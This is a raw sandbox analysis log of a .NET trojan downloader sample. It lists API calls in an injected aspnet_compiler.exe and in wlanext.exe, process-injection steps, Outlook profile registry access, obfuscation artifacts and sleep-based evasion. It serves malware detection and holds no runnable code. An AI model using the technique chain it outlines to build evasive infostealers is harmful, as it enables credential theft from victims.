      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D98A0 NtWriteVirtualMemory,1_2_011D98A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9B00 NtSetValueKey,1_2_011D9B00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011DA3B0 NtGetContextThread,1_2_011DA3B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9A10 NtQuerySection,1_2_011D9A10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9A80 NtOpenDirectoryObject,1_2_011D9A80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011DAD30 NtSetContextThread,1_2_011DAD30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9520 NtWaitForSingleObject,1_2_011D9520
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9560 NtWriteFile,1_2_011D9560
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D95F0 NtQueryInformationFile,1_2_011D95F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011DA710 NtOpenProcessToken,1_2_011DA710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9730 NtQueryVirtualMemory,1_2_011D9730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011DA770 NtOpenThread,1_2_011DA770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9770 NtSetInformationFile,1_2_011D9770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9760 NtOpenProcess,1_2_011D9760
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9610 NtEnumerateValueKey,1_2_011D9610
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9650 NtQueryValueKey,1_2_011D9650
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9670 NtQueryInformationProcess,1_2_011D9670
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D96D0 NtCreateKey,1_2_011D96D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0041E057 NtClose,1_2_0041E057
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0041E107 NtAllocateVirtualMemory,1_2_0041E107
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004012A4 NtProtectVirtualMemory,1_2_004012A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0041DF27 NtCreateFile,1_2_0041DF27
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0041DFD7 NtReadFile,1_2_0041DFD7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0041E101 NtAllocateVirtualMemory,1_2_0041E101
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004014E9 NtProtectVirtualMemory,1_2_004014E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0041DF21 NtCreateFile,1_2_0041DF21
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29840 NtDelayExecution,LdrInitializeThunk,3_2_00C29840
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00C29860
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C299A0 NtCreateSection,LdrInitializeThunk,3_2_00C299A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00C29910
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29A50 NtCreateFile,LdrInitializeThunk,3_2_00C29A50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C295D0 NtClose,LdrInitializeThunk,3_2_00C295D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29540 NtReadFile,LdrInitializeThunk,3_2_00C29540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29560 NtWriteFile,LdrInitializeThunk,3_2_00C29560
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C296D0 NtCreateKey,LdrInitializeThunk,3_2_00C296D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00C296E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29650 NtQueryValueKey,LdrInitializeThunk,3_2_00C29650
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00C29660
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29610 NtEnumerateValueKey,LdrInitializeThunk,3_2_00C29610
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29FE0 NtCreateMutant,LdrInitializeThunk,3_2_00C29FE0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29780 NtMapViewOfSection,LdrInitializeThunk,3_2_00C29780
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29710 NtQueryInformationToken,LdrInitializeThunk,3_2_00C29710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C298F0 NtReadVirtualMemory,3_2_00C298F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C298A0 NtWriteVirtualMemory,3_2_00C298A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C2B040 NtSuspendThread,3_2_00C2B040
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29820 NtEnumerateKey,3_2_00C29820
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C299D0 NtCreateProcessEx,3_2_00C299D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29950 NtQueueApcThread,3_2_00C29950
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29A80 NtOpenDirectoryObject,3_2_00C29A80
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29A00 NtProtectVirtualMemory,3_2_00C29A00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29A10 NtQuerySection,3_2_00C29A10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29A20 NtResumeThread,3_2_00C29A20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C2A3B0 NtGetContextThread,3_2_00C2A3B0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29B00 NtSetValueKey,3_2_00C29B00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C295F0 NtQueryInformationFile,3_2_00C295F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29520 NtWaitForSingleObject,3_2_00C29520
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C2AD30 NtSetContextThread,3_2_00C2AD30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29670 NtQueryInformationProcess,3_2_00C29670
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C297A0 NtUnmapViewOfSection,3_2_00C297A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29760 NtOpenProcess,3_2_00C29760
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C2A770 NtOpenThread,3_2_00C2A770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29770 NtSetInformationFile,3_2_00C29770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C2A710 NtOpenProcessToken,3_2_00C2A710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C29730 NtQueryVirtualMemory,3_2_00C29730
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C8A0 NtReadFile,3_2_0017C8A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C8F0 NtDeleteFile,3_2_0017C8F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C920 NtClose,3_2_0017C920
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C9D0 NtAllocateVirtualMemory,3_2_0017C9D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C7F0 NtCreateFile,3_2_0017C7F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C8EA NtDeleteFile,3_2_0017C8EA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C9CA NtAllocateVirtualMemory,3_2_0017C9CA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017C7EA NtCreateFile,3_2_0017C7EA
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000000.305773304.0000000000152000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000000.305780381.000000000015A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXVXBDDGDGGDG.exe: vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314406799.00000000024D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.315681620.00000000054F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFREAKYFRIDAY.dll: vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314973522.00000000026B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314925377.0000000002677000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFREAKYFRIDAY.dll: vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314925377.0000000002677000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314961698.00000000026A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314944640.0000000002693000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314190423.0000000000AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeBinary or memory string: OriginalFilenameXVXBDDGDGGDG.exe: vs SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: invalid certificate
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeReversingLabs: Detection: 21%
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe.logJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeFile created: C:\Users\user\AppData\Local\Temp\d01F736LJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@7/6
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\XVXBDDGDGGDG.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FREAKYFRIDAY.pdbBSJB source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.315681620.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314925377.0000000002677000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.314711737.0000000000FD7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.312969278.0000000000E34000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.399528771.0000000000888000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.402502298.0000000000A29000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.314711737.0000000000FD7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.312969278.0000000000E34000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.399528771.0000000000888000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.402502298.0000000000A29000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FREAKYFRIDAY.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.315681620.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314925377.0000000002677000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: aspnet_compiler.pdb source: wlanext.exe, 00000003.00000002.571563301.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573238530.0000000003073000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\XVXBDDGDGGDG.pdbBSJB source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011ED0D1 push ecx; ret 1_2_011ED0E4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0042125C push eax; ret 1_2_004212AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004212A9 push eax; ret 1_2_004212AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004212B2 push eax; ret 1_2_00421319
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_00421313 push eax; ret 1_2_00421319
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0040A33F push ebx; ret 1_2_0040A342
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C3D0D1 push ecx; ret 3_2_00C3D0E4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017FB25 push eax; ret 3_2_0017FB78
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017FB72 push eax; ret 3_2_0017FB78
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017FB7B push eax; ret 3_2_0017FBE2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017FBDC push eax; ret 3_2_0017FBE2
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: real checksum: 0xe68c should be: 0x1f7d1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe TID: 396Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe TID: 5136Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 476Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01265BA5 rdtsc 1_2_01265BA5
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 8.6 %
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00172D50 FindFirstFileW,FindNextFileW,FindClose,3_2_00172D50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00172D49 FindFirstFileW,FindNextFileW,FindClose,3_2_00172D49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000002.00000000.359783979.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
